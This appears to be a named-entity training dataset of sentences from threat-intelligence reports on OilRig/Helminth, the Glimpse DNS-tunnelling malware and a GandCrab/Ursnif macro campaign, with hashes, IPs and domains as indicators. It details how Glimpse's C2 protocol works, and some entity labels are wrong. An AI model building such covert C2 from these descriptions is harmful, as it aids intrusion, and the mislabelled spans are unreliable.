{"text": "From April 19-24 , 2017 , a politically-motivated , targeted campaign was carried out against numerous Israeli organizations .", "spans": {}, "info": {"id": "aptner_train_000000", "source": "aptner_train"}}
{"text": "Initial reports of the attacks , published April 26 ( in Hebrew ) by the Israel National Cyber Event Readiness Team ( CERT-IL ) and The Marker , confirm that the attack was delivered through compromised email accounts at Ben-Gurion University and sent to multiple targets across Israel .", "spans": {"Organization: Israel National Cyber Event Readiness Team": [[73, 115]], "Organization: CERT-IL": [[118, 125]], "Organization: Marker": [[136, 142]], "System: email": [[203, 208]], "Organization: Ben-Gurion University": [[221, 242]]}, "info": {"id": "aptner_train_000002", "source": "aptner_train"}}
{"text": "Ironically , Ben-Gurion University is home to Israel ’s Cyber Security Research Center .", "spans": {"Organization: Ben-Gurion University": [[13, 34]], "Organization: Israel ’s Cyber Security Research Center": [[46, 86]]}, "info": {"id": "aptner_train_000003", "source": "aptner_train"}}
{"text": "Investigators put the origin of the attack as Iranian ; Morphisec ’s research supports this conclusion and attributes the attacks to the same infamous hacker group responsible for the OilRig malware campaigns .", "spans": {"Organization: Morphisec": [[56, 65]], "Malware: OilRig": [[184, 190]]}, "info": {"id": "aptner_train_000004", "source": "aptner_train"}}
{"text": "The fileless attack was delivered via Microsoft Word documents that exploited a former zero-day vulnerability in Word , CVE-2017-0199 , to install a fileless attack variant of the Helminth Trojan agent .", "spans": {"Organization: fileless attack": [[4, 19]], "System: Microsoft Word": [[38, 52]], "Vulnerability: zero-day": [[87, 95]], "System: Word": [[113, 117]], "Vulnerability: CVE-2017-0199": [[120, 133]], "Malware: Helminth": [[180, 188]], "Malware: Trojan": [[189, 195]]}, "info": {"id": "aptner_train_000005", "source": "aptner_train"}}
{"text": "Microsoft released the patch for the vulnerability on April 11 , but many organizations have not yet deployed the update .", "spans": {"Organization: Microsoft": [[0, 9]]}, "info": {"id": "aptner_train_000006", "source": "aptner_train"}}
{"text": "The attackers actually based their attack on an existing Proof-of-Concept method that was published by researchers after the patch release .", "spans": {}, "info": {"id": "aptner_train_000007", "source": "aptner_train"}}
{"text": "By hunting through known malware repositories , Morphisec identified matching samples uploaded by Israeli high-tech development companies , medical organizations and education organizations , indicating that they were victims of the attack .", "spans": {"Organization: Morphisec": [[48, 57]], "Organization: medical organizations": [[140, 161]], "Organization: education organizations": [[166, 189]]}, "info": {"id": "aptner_train_000008", "source": "aptner_train"}}
{"text": "For security purposes , Morphisec is not revealing these names .", "spans": {"Organization: Morphisec": [[24, 33]]}, "info": {"id": "aptner_train_000009", "source": "aptner_train"}}
{"text": "Upon deeper investigation into the installed Helminth fileless agent , we identified a near perfect match to the OilRig campaign executed by an Iranian hacker group against 140 financial institutions in the Middle East last year , as analyzed by FireEye , Palo Alto Networks and Logrhythm .", "spans": {"Malware: Helminth": [[45, 53]], "Malware: OilRig": [[113, 119]], "Organization: FireEye": [[246, 253]], "Organization: Palo Alto Networks": [[256, 274]], "Organization: Logrhythm": [[279, 288]]}, "info": {"id": "aptner_train_000010", "source": "aptner_train"}}
{"text": "This group has become one of the most active threat actors , with noteworthy abilities , resources and infrastructure ; speculations indicate the hacking organization to be sponsored by the Iranian government .", "spans": {"Organization: Iranian government": [[190, 208]]}, "info": {"id": "aptner_train_000011", "source": "aptner_train"}}
{"text": "In other recent attacks ( January 2017 ) , the group used a fake Juniper Networks VPN portal and fake University of Oxford websites to deliver malware as described by ClearSky .", "spans": {"System: Juniper Networks VPN": [[65, 85]], "Organization: University of Oxford": [[102, 122]], "Organization: ClearSky": [[167, 175]]}, "info": {"id": "aptner_train_000012", "source": "aptner_train"}}
{"text": "Name SHA256 .", "spans": {}, "info": {"id": "aptner_train_000013", "source": "aptner_train"}}
{"text": "13.doc : a9bbbf5e4797d90d579b2cf6f9d61443dff82ead9d9ffd10f3c31b686ccf81ab .", "spans": {"Indicator: 13.doc": [[0, 6]], "Indicator: a9bbbf5e4797d90d579b2cf6f9d61443dff82ead9d9ffd10f3c31b686ccf81ab": [[9, 73]]}, "info": {"id": "aptner_train_000014", "source": "aptner_train"}}
{"text": "558.doc , 2.doc: 2869664d456034a611b90500f0503d7d6a64abf62d9f9dd432a8659fa6659a84 .", "spans": {"Indicator: 558.doc": [[0, 7]], "Indicator: 2869664d456034a611b90500f0503d7d6a64abf62d9f9dd432a8659fa6659a84": [[17, 81]]}, "info": {"id": "aptner_train_000015", "source": "aptner_train"}}
{"text": "1.doc : 832cc791aad6462687e42e40fd9b261f3d2fbe91c5256241264309a5d437e4d8 .", "spans": {"Indicator: 1.doc": [[0, 5]], "Indicator: 832cc791aad6462687e42e40fd9b261f3d2fbe91c5256241264309a5d437e4d8": [[8, 72]]}, "info": {"id": "aptner_train_000016", "source": "aptner_train"}}
{"text": "3.doc : d4eb4035e11da04841087a181c48cd85f75c620a84832375925e6b03973d8e48 .", "spans": {"Indicator: 3.doc": [[0, 5]], "Indicator: d4eb4035e11da04841087a181c48cd85f75c620a84832375925e6b03973d8e48": [[8, 72]]}, "info": {"id": "aptner_train_000017", "source": "aptner_train"}}
{"text": "The most notable difference from last year ’s OilRig campaign is the way the attack was delivered .", "spans": {"Malware: OilRig": [[46, 52]]}, "info": {"id": "aptner_train_000018", "source": "aptner_train"}}
{"text": "In the previous campaign , the Iranian group sent specially crafted Excel and Word files , which contained macros that targeted individuals were convinced to enable .", "spans": {"System: Excel": [[68, 73]], "System: Word": [[78, 82]]}, "info": {"id": "aptner_train_000019", "source": "aptner_train"}}
{"text": "Name Delivery Server .", "spans": {}, "info": {"id": "aptner_train_000020", "source": "aptner_train"}}
{"text": "test4.hta http://comonscar.in ( 82.145.40.46 ) .", "spans": {"Indicator: test4.hta": [[0, 9]], "Indicator: http://comonscar.in": [[10, 29]], "Indicator: 82.145.40.46": [[32, 44]]}, "info": {"id": "aptner_train_000021", "source": "aptner_train"}}
{"text": "test5.hta 80.82.67.42 .", "spans": {"Indicator: test5.hta": [[0, 9]], "Indicator: 80.82.67.42": [[10, 21]]}, "info": {"id": "aptner_train_000022", "source": "aptner_train"}}
{"text": "test1.hta reserved .", "spans": {"Indicator: test1.hta": [[0, 9]]}, "info": {"id": "aptner_train_000023", "source": "aptner_train"}}
{"text": "SHA256: 5ac61ea5142d53412a251eb77f2961e3334a00c83da9087d355a49618220ac43 .", "spans": {"Indicator: 5ac61ea5142d53412a251eb77f2961e3334a00c83da9087d355a49618220ac43": [[8, 72]]}, "info": {"id": "aptner_train_000024", "source": "aptner_train"}}
{"text": "Name SHA256 .", "spans": {}, "info": {"id": "aptner_train_000025", "source": "aptner_train"}}
{"text": "0011.ps1 042F60714E9347DB422E1A3A471DC0301D205FFBD053A4015D2B509DB92029D1 .", "spans": {"Indicator: 0011.ps1": [[0, 8]], "Indicator: 042F60714E9347DB422E1A3A471DC0301D205FFBD053A4015D2B509DB92029D1": [[9, 73]]}, "info": {"id": "aptner_train_000026", "source": "aptner_train"}}
{"text": "1.vbs BE7F1D411CC4160BB221C7181DA4370972B6C867AF110C12850CAD77981976ED .", "spans": {"Indicator: 1.vbs": [[0, 5]], "Indicator: BE7F1D411CC4160BB221C7181DA4370972B6C867AF110C12850CAD77981976ED": [[6, 70]]}, "info": {"id": "aptner_train_000027", "source": "aptner_train"}}
{"text": "A Glimpse into Glimpse For the second blog post in our series, the IronNet Threat Research Team examines the Glimpse malware that is written in PowerShell and has been associated with OilRig .", "spans": {"Organization: Glimpse": [[15, 22]], "Organization: IronNet Threat Research Team": [[67, 95]], "Malware: Glimpse": [[109, 116]], "System: PowerShell": [[144, 154]], "Organization: OilRig": [[184, 190]]}, "info": {"id": "aptner_train_000028", "source": "aptner_train"}}
{"text": "Our first post about analyzing malware with DNS tunneling capabilities focuses on how the PoisonFrog malware uses DNS tunneling to send and receive victim information and commands .", "spans": {"Malware: PoisonFrog": [[90, 100]]}, "info": {"id": "aptner_train_000029", "source": "aptner_train"}}
{"text": "Glimpse : 6e86c57385d26a59c0df1580454b9967 .", "spans": {"Malware: Glimpse": [[0, 7]], "Indicator: 6e86c57385d26a59c0df1580454b9967": [[10, 42]]}, "info": {"id": "aptner_train_000030", "source": "aptner_train"}}
{"text": "Glimpse is a PowerShell script that is executed silently by Visual Basic script .", "spans": {"Malware: Glimpse": [[0, 7]], "System: PowerShell": [[13, 23]], "System: Visual Basic": [[60, 72]]}, "info": {"id": "aptner_train_000031", "source": "aptner_train"}}
{"text": "Based on the code, it is unclear what initiates the Visual Basic script itself .", "spans": {"System: Visual Basic": [[52, 64]]}, "info": {"id": "aptner_train_000032", "source": "aptner_train"}}
{"text": "However, a variety of typical persistence mechanisms, such as a scheduled task, could serve that purpose .", "spans": {}, "info": {"id": "aptner_train_000033", "source": "aptner_train"}}
{"text": "After Glimpse starts, it checks for the existence of a directory and lock file .", "spans": {"Malware: Glimpse": [[6, 13]]}, "info": {"id": "aptner_train_000034", "source": "aptner_train"}}
{"text": "If no directory or lock file is found, Glimpse creates one .", "spans": {"Malware: Glimpse": [[39, 46]]}, "info": {"id": "aptner_train_000035", "source": "aptner_train"}}
{"text": "Alternatively, if these do exist and the lock file is older than 10 minutes, the lock file is deleted and the previously running Glimpse script is killed .", "spans": {"Malware: Glimpse": [[129, 136]]}, "info": {"id": "aptner_train_000036", "source": "aptner_train"}}
{"text": "After the initial checks described above, Glimpse creates a hidden file that contains an agent ID, which is a simple concatenation of a random number 10-99 and the first 8 characters of a GUID without dashes .", "spans": {"Malware: Glimpse": [[42, 49]], "System: GUID": [[188, 192]]}, "info": {"id": "aptner_train_000037", "source": "aptner_train"}}
{"text": "The methods employed by Glimpse to perform DNS communications are determined by the mode in which it is operating (i.e., text mode or ping mode ) .", "spans": {"Malware: Glimpse": [[24, 31]]}, "info": {"id": "aptner_train_000038", "source": "aptner_train"}}
{"text": "In text mode, Glimpse manually builds a DNS query to be transmitted over a UDP socket .", "spans": {"Malware: Glimpse": [[14, 21]], "System: UDP socket": [[75, 85]]}, "info": {"id": "aptner_train_000039", "source": "aptner_train"}}
{"text": "In ping mode, Glimpse uses a .NET method .", "spans": {"Malware: Glimpse": [[14, 21]], "Indicator: a .NET": [[27, 33]]}, "info": {"id": "aptner_train_000040", "source": "aptner_train"}}
{"text": "The table below describes the operational mode, record types used, and the method used to send the query .", "spans": {}, "info": {"id": "aptner_train_000041", "source": "aptner_train"}}
{"text": "The first DNS query by Glimpse requests the mode to be used in future communications with the controller (i.e., ping mode or text mode ) .", "spans": {"Malware: Glimpse": [[23, 30]]}, "info": {"id": "aptner_train_000042", "source": "aptner_train"}}
{"text": "Prior to making any query, a function called AdrGen is used to build a query string .", "spans": {}, "info": {"id": "aptner_train_000043", "source": "aptner_train"}}
{"text": "This function takes several parameters, most of which are represented in the subdomain label(s) of the query string .", "spans": {}, "info": {"id": "aptner_train_000044", "source": "aptner_train"}}
{"text": "Below is a list of AdrGen parameters .", "spans": {}, "info": {"id": "aptner_train_000045", "source": "aptner_train"}}
{"text": "As mentioned above, one of the parameters passed to the AdrGen function is the action parameter .", "spans": {}, "info": {"id": "aptner_train_000046", "source": "aptner_train"}}
{"text": "Table 5: Glimpse action parameters values for the AdrGen function below contains the possible parameters, a brief description, and return values applicable to the action parameter .", "spans": {"Malware: Glimpse": [[9, 16]]}, "info": {"id": "aptner_train_000047", "source": "aptner_train"}}
{"text": "The query to set the receive mode expects an A resource record response from the controller .", "spans": {}, "info": {"id": "aptner_train_000048", "source": "aptner_train"}}
{"text": "The controller will respond with one of two responses: 99.250.250.199 will set the receive mode to text .", "spans": {"Indicator: 99.250.250.199": [[55, 69]]}, "info": {"id": "aptner_train_000049", "source": "aptner_train"}}
{"text": "Any other IP address will set the receive mode to ping, although the server-side software suggests 199.250.250.99 will be sent .", "spans": {"Indicator: 199.250.250.99": [[99, 113]]}, "info": {"id": "aptner_train_000050", "source": "aptner_train"}}
{"text": "When set in text receive mode, the malware uses the AdrGen function to create another query string with the r (receiver) flag and a W (wait) action parameter .", "spans": {}, "info": {"id": "aptner_train_000051", "source": "aptner_train"}}
{"text": "The expected TXT record response has the following structure: command>data .", "spans": {}, "info": {"id": "aptner_train_000052", "source": "aptner_train"}}
{"text": "In our sample traffic, the TXT resource record returned contained: S000s>10100 .", "spans": {}, "info": {"id": "aptner_train_000053", "source": "aptner_train"}}
{"text": "This response tells the malware to set a variable for the file name to receivebox\\rcvd10100 and set the next query action to D in order to request the next chunk of data .", "spans": {"Indicator: receivebox\\rcvd10100": [[71, 91]]}, "info": {"id": "aptner_train_000054", "source": "aptner_train"}}
{"text": "The malware sends another TXT query with the receiver structure .", "spans": {}, "info": {"id": "aptner_train_000055", "source": "aptner_train"}}
{"text": "This query is depicted below: 39e9D60005eca60000BCC64T.sample-domain.evil In the case of our sample traffic, the server responded with the following TXT resource record data: S0000>d2hvYW1pJmlwY29uZmlnIC9hbGw= .", "spans": {"Indicator: 39e9D60005eca60000BCC64T.sample-domain.evil": [[30, 73]]}, "info": {"id": "aptner_train_000056", "source": "aptner_train"}}
{"text": "The controller provided the malware with base64-encoded data to be decoded .", "spans": {}, "info": {"id": "aptner_train_000057", "source": "aptner_train"}}
{"text": "The data will eventually be written to disk and the malware sets the next query action to D in order to request the next chunk of data .", "spans": {}, "info": {"id": "aptner_train_000058", "source": "aptner_train"}}
{"text": "The decoded data shows a command to be executed whoami&ipconfig /all on the victim system .", "spans": {}, "info": {"id": "aptner_train_000059", "source": "aptner_train"}}
{"text": "The malware sends another TXT query with the receiver structure, as depicted below .", "spans": {}, "info": {"id": "aptner_train_000060", "source": "aptner_train"}}
{"text": "Note the request number parameter is now 0001: 39e965e000caD60001679C79T.sample-domain.evil .", "spans": {"Indicator: 39e965e000caD60001679C79T.sample-domain.evil": [[47, 91]]}, "info": {"id": "aptner_train_000061", "source": "aptner_train"}}
{"text": "The TXT record returned contained data: E0000>0 .", "spans": {}, "info": {"id": "aptner_train_000062", "source": "aptner_train"}}
{"text": "The controller issued the command to write the base64-decoded and modified data to the file name set earlier in the exchange .", "spans": {}, "info": {"id": "aptner_train_000063", "source": "aptner_train"}}
{"text": "After the file is written, the malware moves on to process operations .", "spans": {}, "info": {"id": "aptner_train_000064", "source": "aptner_train"}}
{"text": "Glimpse can be set to use ping mode in several ways while performing receive operations .", "spans": {"Malware: Glimpse": [[0, 7]]}, "info": {"id": "aptner_train_000065", "source": "aptner_train"}}
{"text": "If a query with the M action returns an IP address that is not 99.250.250.199 , the malware will use ping mode .", "spans": {"Indicator: 99.250.250.199": [[63, 77]]}, "info": {"id": "aptner_train_000066", "source": "aptner_train"}}
{"text": "It is worth noting that the IP response observed to set ping mode was the reverse of the IP used to set text mode (i.e., 199.250.250.99 ) .", "spans": {"Indicator: 199.250.250.99": [[121, 135]]}, "info": {"id": "aptner_train_000067", "source": "aptner_train"}}
{"text": "Ping mode will also be set if exceptions occur more than three times during text mode .", "spans": {}, "info": {"id": "aptner_train_000068", "source": "aptner_train"}}
{"text": "In the latter case, the P action is passed as one of the parameters to AdrGen and the query is made for an A resource record using the [System.Net.Dns]::GetHostAddresses method .", "spans": {}, "info": {"id": "aptner_train_000069", "source": "aptner_train"}}
{"text": "If performing receive operations in ping mode, Glimpse makes a query with the 0 action to contact the controller for tasking .", "spans": {"Malware: Glimpse": [[47, 54]]}, "info": {"id": "aptner_train_000070", "source": "aptner_train"}}
{"text": "This query uses a receive structure similar to an M action; it is worth noting all of the receiver operation queries made in ping mode use the [System.Net.Dns]::GetHostAddresses method .", "spans": {}, "info": {"id": "aptner_train_000071", "source": "aptner_train"}}
{"text": "In our sample, after the malware sent the 0 action, the controller responded with an A record containing 24.125.10.140 .", "spans": {"Indicator: 24.125.10.140": [[105, 118]]}, "info": {"id": "aptner_train_000072", "source": "aptner_train"}}
{"text": "This response tells the malware to: Set the file name for the data that will follow to 10140, Set the part number to 0, Parse response data, Set a 1 action for the next query .", "spans": {}, "info": {"id": "aptner_train_000073", "source": "aptner_train"}}
{"text": "Query: 00039e9650eca66C06T.sample-domain.evil , Response: 24.125.10.140 , File name: 10140, Query: 139e965e000ca6D2C80T.sample-domain.evil , Response: 110.101.116.0 , Query: 00339e965e1ca6EF4C07T.sample-domain.evil , Response: 32.117.115.3 , Query: 30069e 1965eca6FE8C13T.sample-domain.evil, Response: 101.114.32.6 , Query: 391 e960095eca63570BC62T.sample-domain.evil , Response: 1.2.3.0 .", "spans": {"Indicator: 00039e9650eca66C06T.sample-domain.evil": [[7, 45]], "Indicator: 24.125.10.140": [[58, 71]], "Indicator: 139e965e000ca6D2C80T.sample-domain.evil": [[99, 138]], "Indicator: 110.101.116.0": [[151, 164]], "Indicator: 00339e965e1ca6EF4C07T.sample-domain.evil": [[174, 214]], "Indicator: 32.117.115.3": [[227, 239]], "Indicator: 101.114.32.6": [[302, 314]], "Indicator: 391 e960095eca63570BC62T.sample-domain.evil": [[324, 367]], "Indicator: 1.2.3.0": [[380, 387]]}, "info": {"id": "aptner_train_000074", "source": "aptner_train"}}
{"text": "In this case, the content net user is written to rcvd10140 .", "spans": {}, "info": {"id": "aptner_train_000075", "source": "aptner_train"}}
{"text": "After writing the data to disk, receiver operations are complete and processor operations begin .", "spans": {}, "info": {"id": "aptner_train_000076", "source": "aptner_train"}}
{"text": "After writing the data received from the controller, a function is called to process the received file .", "spans": {}, "info": {"id": "aptner_train_000077", "source": "aptner_train"}}
{"text": "The processor function builds a list of files from the files with content that match rcvd* in the receivebox directory .", "spans": {}, "info": {"id": "aptner_train_000078", "source": "aptner_train"}}
{"text": "Similar to PoisonFrog , the last digit of the received file name determines how the content of the file is processed .", "spans": {"Malware: PoisonFrog": [[11, 21]]}, "info": {"id": "aptner_train_000079", "source": "aptner_train"}}
{"text": "In our sample traffic, after executing the commands sent via cmd.exe , Glimpse writes the output of the commands in the sendbox directory to the appropriate file names (e.g., 10100 or 10140) prepended with proc (e.g., proc10100 ) .", "spans": {"Indicator: cmd.exe": [[61, 68]], "Malware: Glimpse": [[71, 78]]}, "info": {"id": "aptner_train_000080", "source": "aptner_train"}}
{"text": "Once written, the send operations begin .", "spans": {}, "info": {"id": "aptner_train_000081", "source": "aptner_train"}}
{"text": "Similar to text mode receiver, after AdrGen builds the string, a function to manually build and send the DNS query packet is called .", "spans": {"Malware: AdrGen": [[37, 43]]}, "info": {"id": "aptner_train_000082", "source": "aptner_train"}}
{"text": "The text mode sender uses the same hardcoded transaction ID 0xa4a3; however, instead of sending queries for TXT resource records, the malware uses A resource records .", "spans": {}, "info": {"id": "aptner_train_000083", "source": "aptner_train"}}
{"text": "As with the text mode receiver, the query is made with a direct connection to the controller IP address as opposed to allowing the query to propagate the native DNS architecture .", "spans": {}, "info": {"id": "aptner_train_000084", "source": "aptner_train"}}
{"text": "If the send function is being invoked in ping mode, the process described above is followed; however, instead of manually building and transmitting the DNS query, the [System.Net.Dns]::GetHostAddresses method is used .", "spans": {}, "info": {"id": "aptner_train_000085", "source": "aptner_train"}}
{"text": "With that method, the malware’s query will traverse the native DNS architecture as opposed to the victim making a direct connection to the controller .", "spans": {}, "info": {"id": "aptner_train_000086", "source": "aptner_train"}}
{"text": "The send function uses several counters to maintain various pieces of information used to control the flow of execution .", "spans": {}, "info": {"id": "aptner_train_000087", "source": "aptner_train"}}
{"text": "An exception counter is used to track the number of exceptions and will exit the send loop if a threshold is hit .", "spans": {}, "info": {"id": "aptner_train_000088", "source": "aptner_train"}}
{"text": "The send counter is used to track the number of chunks sent to the controller .", "spans": {}, "info": {"id": "aptner_train_000089", "source": "aptner_train"}}
{"text": "An additional counter exists to handle cases where the file being sent is larger than 250 chunks .", "spans": {}, "info": {"id": "aptner_train_000090", "source": "aptner_train"}}
{"text": "The send counter is initialized to 0 and read from the fourth octet of the A record returned by the controller .", "spans": {}, "info": {"id": "aptner_train_000091", "source": "aptner_train"}}
{"text": "The send counter is also passed to the AdrGen function as the part number parameter and is visible in the query string as depicted below: Query: 239e965ec000a60000B6C90T.COCTab33333233332222222222222222210100A3280AAAAAAAAAAAAAAAAA.33333210100A.sample-domain.evil , Response: 39.2.3.1 , Query: 230019e965eca60000A16DC20T.EBB466767667256666772556776662FBFD932F3F64079E4F730B65239FE0.33333210100A.sample-domain.evil , Response: 39.2.3.2 , Query: 392e002965eca60000C6D18C42T.33232333332333500262233332466710E0E18362E239DDA839020190D932.33333210100A.sample-domain.evil .", "spans": {"Malware: AdrGen": [[39, 45]], "Indicator: 239e965ec000a60000B6C90T.COCTab33333233332222222222222222210100A3280AAAAAAAAAAAAAAAAA.33333210100A.sample-domain.evil": [[145, 262]], "Indicator: 39.2.3.1": [[275, 283]], "Indicator: 230019e965eca60000A16DC20T.EBB466767667256666772556776662FBFD932F3F64079E4F730B65239FE0.33333210100A.sample-domain.evil": [[293, 412]], "Indicator: 39.2.3.2": [[425, 433]], "Indicator: 392e002965eca60000C6D18C42T.33232333332333500262233332466710E0E18362E239DDA839020190D932.33333210100A.sample-domain.evil": [[443, 563]]}, "info": {"id": "aptner_train_000092", "source": "aptner_train"}}
{"text": "When the send loop has fewer than 60 bytes to send (e.g., a small file or the last part of a file), the send function transmits the remaining bytes with a shorter data section .", "spans": {}, "info": {"id": "aptner_train_000093", "source": "aptner_train"}}
{"text": "When there are no more bytes to send, a hardcoded file end marker COCTabCOCT is sent in the data section and the send loop will be exited .", "spans": {}, "info": {"id": "aptner_train_000094", "source": "aptner_train"}}
{"text": "The controller responds with the 253.25.42.87 A record response .", "spans": {"Indicator: 253.25.42.87": [[33, 45]]}, "info": {"id": "aptner_train_000095", "source": "aptner_train"}}
{"text": "Query: 239055e965eca60000CC30T.66654667676673003300C93CC92212953EDACEDA.33333210100A.sample-domain.evil , Response: 39.2.3.56 , Query: 05639e9652eca6000057C06T.COCTabCOCT33333210100A.sample-domain.evil , Response: 253.25.42.87 .", "spans": {"Indicator: 239055e965eca60000CC30T.66654667676673003300C93CC92212953EDACEDA.33333210100A.sample-domain.evil": [[7, 103]], "Indicator: 39.2.3.56": [[116, 125]], "Indicator: 05639e9652eca6000057C06T.COCTabCOCT33333210100A.sample-domain.evil": [[135, 201]], "Indicator: 253.25.42.87": [[214, 226]]}, "info": {"id": "aptner_train_000096", "source": "aptner_train"}}
{"text": "Once an A record response is received by the malware containing 253.25.42.87 , several variables are set in preparation to exit the send operation .", "spans": {"Indicator: 253.25.42.87": [[64, 76]]}, "info": {"id": "aptner_train_000097", "source": "aptner_train"}}
{"text": "After the send operation is complete, the lock file for the current run is deleted and the script exits .", "spans": {}, "info": {"id": "aptner_train_000098", "source": "aptner_train"}}
{"text": "Many of the capabilities discovered in Glimpse were also present in the malware analyzed in part one of this series .", "spans": {"Malware: Glimpse": [[39, 46]]}, "info": {"id": "aptner_train_000099", "source": "aptner_train"}}
{"text": "Glimpse added the ability to use an alternate DNS resource record type (TXT) as opposed to solely relying on A resource records for DNS queries .", "spans": {"Malware: Glimpse": [[0, 7]]}, "info": {"id": "aptner_train_000100", "source": "aptner_train"}}
{"text": "Using TXT resource records enabled the actors to provide tasking in fewer transactions due to the amount of data that can be transmitted in a TXT response .", "spans": {}, "info": {"id": "aptner_train_000101", "source": "aptner_train"}}
{"text": "To support this capability, the adversaries chose to manually craft the DNS queries and communicate directly with the controller as opposed to using existing .NET DNS libraries .", "spans": {"Indicator: .NET": [[158, 162]]}, "info": {"id": "aptner_train_000102", "source": "aptner_train"}}
{"text": "The differences between PoisonFrog and Glimpse highlight the ease at which adversaries can modify their tools to meet their end objectives .", "spans": {"Malware: PoisonFrog": [[24, 34]], "Malware: Glimpse": [[39, 46]]}, "info": {"id": "aptner_train_000103", "source": "aptner_train"}}
{"text": "With regard to detection, several methods can be used to identify this type of C2 activity .", "spans": {"System: C2": [[79, 81]]}, "info": {"id": "aptner_train_000104", "source": "aptner_train"}}
{"text": "Performing entropy calculations on subdomain labels can help highlight the amount of randomness in a label, but this is just one of many possible data analysis points, since a standalone feature may not be enough to determine whether traffic is malicious .", "spans": {}, "info": {"id": "aptner_train_000105", "source": "aptner_train"}}
{"text": "The IronDefense Network Traffic Analysis platform combines several behavioral detection methods alongside historical network information to detect the C2 techniques used by Glimpse and other malware .", "spans": {"System: C2": [[151, 153]], "Malware: Glimpse": [[173, 180]]}, "info": {"id": "aptner_train_000106", "source": "aptner_train"}}
{"text": "Carbon Black TAU ThreatSight Analysis GandCrab and Ursnif Campaign .", "spans": {"Organization: Carbon Black TAU ThreatSight": [[0, 28]], "Malware: GandCrab": [[38, 46]], "Malware: Ursnif": [[51, 57]]}, "info": {"id": "aptner_train_000107", "source": "aptner_train"}}
{"text": "The Carbon Black ThreatSight team observed an interesting campaign over the last month .", "spans": {"Organization: Carbon Black ThreatSight": [[4, 28]]}, "info": {"id": "aptner_train_000108", "source": "aptner_train"}}
{"text": "ThreatSight worked with the Threat Analysis Unit ( TAU ) to research the campaign .", "spans": {"Organization: ThreatSight": [[0, 11]], "Organization: Threat Analysis Unit": [[28, 48]], "Organization: TAU": [[51, 54]]}, "info": {"id": "aptner_train_000109", "source": "aptner_train"}}
{"text": "This report is being released to help researchers and security practitioners combat this campaign as new samples are being discovered in the wild daily .", "spans": {}, "info": {"id": "aptner_train_000110", "source": "aptner_train"}}
{"text": "This attack , if successful , can infect a compromised system with both Ursnif malware and GandCrab ransomware .", "spans": {"Malware: Ursnif": [[72, 78]], "Malware: GandCrab": [[91, 99]]}, "info": {"id": "aptner_train_000111", "source": "aptner_train"}}
{"text": "The overall attack leverages several different approaches , which are popular techniques amongst red teamers , espionage focused adversaries , and large scale criminal campaigns .", "spans": {}, "info": {"id": "aptner_train_000112", "source": "aptner_train"}}
{"text": "This campaign originally came in via phishing emails that contained an attached Word document with embedded macros , Carbon Black located roughly 180 variants in the wild .", "spans": {"System: Word document": [[80, 93]], "Organization: Carbon Black": [[117, 129]]}, "info": {"id": "aptner_train_000113", "source": "aptner_train"}}
{"text": "The macro would call an encoded PowerShell script and then use a series of techniques to download and execute both a Ursnif and GandCrab variant .", "spans": {"System: PowerShell": [[32, 42]], "Malware: Ursnif": [[117, 123]], "Malware: GandCrab": [[128, 136]]}, "info": {"id": "aptner_train_000114", "source": "aptner_train"}}
{"text": "This campaign has been discussed at a high level by other researchers publicly .", "spans": {}, "info": {"id": "aptner_train_000115", "source": "aptner_train"}}
{"text": "Carbon Black product specific content can be located in the User Exchange .", "spans": {"Organization: Carbon Black": [[0, 12]], "System: User Exchange": [[60, 73]]}, "info": {"id": "aptner_train_000116", "source": "aptner_train"}}
{"text": "In this campaign the attackers used a MS Word document ( .doc format ) to deliver the initial stages .", "spans": {"System: MS Word": [[38, 45]], "Indicator: .doc": [[57, 61]]}, "info": {"id": "aptner_train_000117", "source": "aptner_train"}}
{"text": "It should be noted that out of the roughly 180 Word variants that were located by Carbon Black , the biggest difference in the documents was the metadata and junk data located in the malicious macros .", "spans": {"System: Word": [[47, 51]], "Organization: Carbon Black": [[82, 94]]}, "info": {"id": "aptner_train_000118", "source": "aptner_train"}}
{"text": "However the metadata clearly showed that the documents prepared for this campaign were initially saved on December 17 , 2018 and have continued to be updated through January 21 , 2019 .", "spans": {}, "info": {"id": "aptner_train_000119", "source": "aptner_train"}}
{"text": "Several metadata fields ( specifically title , subject , author , comments , manager , and company ) appear to have been populated with different data sets .", "spans": {}, "info": {"id": "aptner_train_000120", "source": "aptner_train"}}
{"text": "For example the subject in all the samples was a combination of a US state and a common first name ( like Utah Erick or Tennessee Dayna ) .", "spans": {}, "info": {"id": "aptner_train_000121", "source": "aptner_train"}}
{"text": "For this post the following sample was analyzed .", "spans": {}, "info": {"id": "aptner_train_000122", "source": "aptner_train"}}
{"text": "Richard_Johnson.doc : 878e4e8677e68aba918d930f2cc67fbe 0a3f915dd071e862046949885043b3ba61100b946cbc0d84ef7c44d77a50f080 .", "spans": {"Indicator: Richard_Johnson.doc": [[0, 19]], "Indicator: 878e4e8677e68aba918d930f2cc67fbe": [[22, 54]], "Indicator: 0a3f915dd071e862046949885043b3ba61100b946cbc0d84ef7c44d77a50f080": [[55, 119]]}, "info": {"id": "aptner_train_000123", "source": "aptner_train"}}
{"text": "The document contained a VBS macro that once decompressed was approximately 650 lines of code .", "spans": {"System: VBS macro": [[25, 34]]}, "info": {"id": "aptner_train_000124", "source": "aptner_train"}}
{"text": "The vast majority of that was junk code .", "spans": {}, "info": {"id": "aptner_train_000125", "source": "aptner_train"}}
{"text": "Once the junk code was removed from the VBScript , there are approximately 18 lines of relevant code , which ultimately call a shape box in the current document .", "spans": {"System: VBScript": [[40, 48]]}, "info": {"id": "aptner_train_000126", "source": "aptner_train"}}
{"text": "The variable names themselves are not relevant , however the methods in bold below will retrieve the AlternativeText field from the specified shape , which is then executed .", "spans": {"System: AlternativeText": [[101, 116]]}, "info": {"id": "aptner_train_000127", "source": "aptner_train"}}
{"text": "The alternate text can easily be observed in the body of the office document .", "spans": {}, "info": {"id": "aptner_train_000128", "source": "aptner_train"}}
{"text": "The area highlighted in blue is the shape name that is being located , while the text itself is highlighted in red .", "spans": {}, "info": {"id": "aptner_train_000129", "source": "aptner_train"}}
{"text": "It is clear that the text is a base64 encoded command , that is then executed by the above VBScript .", "spans": {"System: VBScript": [[91, 99]]}, "info": {"id": "aptner_train_000130", "source": "aptner_train"}}
{"text": "The PowerShell script will first create an instance of the .Net Webclient class and then enumerate the available methods using the GetMethods() call ( highlighted in the image in red ) .", "spans": {"System: PowerShell": [[4, 14]], "Indicator: .Net": [[59, 63]], "System: GetMethods()": [[131, 143]]}, "info": {"id": "aptner_train_000131", "source": "aptner_train"}}
{"text": "The enumerated methods are stored , then a for loop looks first for the method named DownloadString ( highlighted in blue ) .", "spans": {"System: DownloadString": [[85, 99]]}, "info": {"id": "aptner_train_000132", "source": "aptner_train"}}
